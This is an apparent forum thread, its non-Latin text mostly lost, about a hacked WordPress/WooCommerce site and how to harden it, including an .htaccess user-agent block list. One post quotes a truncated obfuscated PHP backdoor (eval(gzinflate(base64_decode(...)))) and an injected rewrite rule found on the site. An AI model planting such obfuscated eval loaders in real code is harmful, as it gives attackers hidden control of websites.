Results 1 to 15 of 15
Thread: Wordpress
Hybrid View
-
7th August 2017 09:05 #1
Wordpress
, - - .

, woocommerce. , , wordpress. 4.6.7. , - 4.7.2, .
, , , (4.8.1) ..., .
, , ( ). , (), , . , - 12 .
, ( ), . .
, brute force /xmlrpc.php /wp-login.php
. .
, , ., , .
...
-
7th August 2017 10:56 #2
wordpress, '', -! global , "" "" , () ..., 5-6 .
.
(. ) login, 5 . ....
, login, ( 12 )?
-
7th August 2017 10:59 #3
, . phpmail WP.
6-7 .
:
.htaccess
( https://www.smashingmagazine.com/201...ns-ownerships/ )
!
-
7th August 2017 13:07 #4
1- .
cPanel .
, /xmlrpc.php /wp-login.php.
.
- Wordpress
- Wordpress.
readme.html, license.txt, wp-config-sample.php
- Login Lockdown 5 IP, 5 .
180 .
- "honeypot" () , .
- 404
- Trace Track
- 6G/5G blacklist
-
- -
- wp-config.php wodpress
- wp-config.php public-html,
- wp-admin.php e .htaccess IP
- .htaccess public-html Script Injections, xmlrpc.php
- ,
- , ,<IfModule mod_setenvif.c>
SetEnvIfNoCase User-Agent ^$ keep_out
SetEnvIfNoCase User-Agent (casper|cmsworldmap|diavol|dotbot) keep_out
SetEnvIfNoCase User-Agent (flicky|ia_archiver|jakarta|kmccrew) keep_out
SetEnvIfNoCase User-Agent (purebot|comodo|feedfinder|planetwork) keep_out
SetEnvIfNoCase User-Agent (libwww|planetwork|pycurl|skygrid) keep_out
SetEnvIfNoCase User-Agent (purebot|comodo|feedfinder|turnit) keep_out
SetEnvIfNoCase User-Agent (zmeu|nutch|vikspider|binlar|sucker) keep_out
<Limit GET POST PUT>
Order Allow,Deny
Allow from all
Deny from env=keep_out
</Limit>
</IfModule>
, 26 .
wordpress (/wp-login), admin.
Brute Force /wp-login.php admin , , .
, . ip- .
, , .
.
, wordpress , . , .
?phpmail WP.
Name File/Folder Current Permissions Recommended Permissions
root directory /public_html/ 0755 0755 No Action Required
wp-includes/ /public_html/wp-includes 0755 0755 No Action Required
.htaccess /public_html/.htaccess 0644 0644 No Action Required
wp-admin/index.php /public_html/wp-admin/index.php 0644 0644 No Action Required
wp-admin/js/ /public_html/wp-admin/js/ 0755 0755 No Action Required
wp-content/themes/ /public_html/wp-content/themes 0755 0755 No Action Required
wp-content/plugins/ /public_html/wp-content/plugins 0755 0755 No Action Required
wp-admin/ /public_html/wp-admin 0755 0755 No Action Required
wp-content/ /public_html/wp-content 0755 0755 No Action Required
wp-config.php /wp-config.php 0644 0644 No Action RequiredLast edited by MegatroniC; 7th August 2017 at 13:11.
, , .
...
-
7th August 2017 13:34 #5
-
7th August 2017 14:14 #6
detectify
.
/xmlrpc.php webserver-a (403 Forbidden) ( )
wp-login.php Rename wp-login.php .
wp-login.php (90 % )Last edited by rumenchooo; 7th August 2017 at 15:00.
-
7th August 2017 14:20 #7
1. . ( 3:34 , , )
2. htaccess " RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.jpds$ new.php?$1=$2-$3 [L] " ??
3. "eval(gzinflate(base64_decode(' " ( " <?php
@error_reporting(0);
@set_time_limit(0);
eval(gzinflate(base64_decode('5b1rV9vIEi j6OXut/R86Gu+RPTHGNkkmMZhACCQQAhmeeZDjkW3ZVpAtj SRjSIb/fqqqH2q9jElm77PuumQF7O7q6upXdXV1dVXJmkaj jm+F4cwL+qzNDGP13/8q9TzXC/DbL/3BE0rp2wNr6kYdqxc53gSyzB3HtcN31sTUs6eh3b G+WtcAEAVTW8/qjawgtCMseu5M+t4sXGo0nzSw+L//5QzKD+2xH92US53j7aOz7aPP5puTk/edU/jW2Xy9fXBifqlU2Pd//4vBTwnqCTaH9iQKAZ8VBNZN2XjteUPXNqrMOHang Y8f3h0fvPQi/ORYHSvojZwrO8CvH61J377GT0fWuOtCYmWVowZK/MAedsZW1BuVzWWT1Zgz9l2vb5fNv82qXncF8sxlB xMXoRp/RrbVt4MygS03anX2uP6YHXgR2/Gmk74pqcAf+9qJxNfbf//rFrtpI7TDEPq/E0ZWEJUResOZOB3o17JpB4EXdFxvaFYPTvf3k5mQ 3CGA0KzWk1lj67pjX9u9KY5sJ3LGtgSBb... "
, 15 2016 17 2017 ( ). .
:
1. ? , , .. ?
-
7th August 2017 15:32 #8
@ skrubalov, , cPanel-a . . .. , .
htaccess , - , .
, , php .3. "eval(gzinflate(base64_decode('
.:
1. ? , , .. ?
, , .
, .
, ...
. .
.
:
ip: 46.119.112.177
: - /products/ /
: 8/7/17, 3:06 PM
: 1139
URL : chatr0ulette.v1de0/ ( , )
, public_html, /9288
, ip- .
. , ., , .
...




Reply With Quote

Lenovo ThinkPad 15 IdeaPad 15
5th May 2023, 22:16 in